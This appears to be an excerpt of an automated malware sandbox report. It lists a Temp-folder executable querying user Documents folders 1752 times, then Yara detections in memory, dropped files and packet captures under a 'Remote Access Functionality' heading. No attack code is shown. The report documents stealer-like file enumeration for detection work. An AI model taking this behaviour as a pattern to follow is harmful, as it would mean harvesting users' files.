Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\HMPPSXQPQV
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LFOPODGVOH
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\CZQKSDDMWR
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\LHEPQPGEWF
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\ZUYYDJDFVF
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\FAAGWHBVUU
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\GJBHWQDROJ
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NIRMEKAMZH
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\BWDRWEEARI
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\UNKRLCVOHV
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\AQRFEVRTGL
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1002596001\100bc97ff1.exe Directory queried: number of queries: 1752
Source: Yara match File source: 00000015.00000003.2400684236.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2306562309.0000000000DF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2474497787.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2442576181.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2435853665.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2284222994.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2270049277.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2269895043.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2270520571.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2402886405.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2400411053.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2501065889.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2473488619.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2501395526.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2300426734.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2418338692.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2269779163.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2283911679.0000000000DF5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2416045693.00000000013C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.2480184057.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2300881497.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2269655803.0000000000DF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2251676644.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2300638023.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2283284801.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 100bc97ff1.exe PID: 6228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 100bc97ff1.exe PID: 5796, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: Process Memory Space: ee3f3c2bda.exe PID: 4100, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 6604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 100bc97ff1.exe PID: 6228, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 100bc97ff1.exe PID: 5796, type: MEMORYSTR
Source: Yara match File source: 39.0.num.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.num.exe.e60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.76bf5a4dba.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.76bf5a4dba.exe.320000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000002.2527848797.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2427332199.0000000000E61000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2307921520.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2427703297.0000000000E7E000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2435358358.000000000168E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2351036059.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.2407308051.0000000000E7E000.00000002.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2348423588.0000000000321000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.2407233161.0000000000E61000.00000080.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.2454084311.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2512290004.0000000000321000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 76bf5a4dba.exe PID: 4304, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002599001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs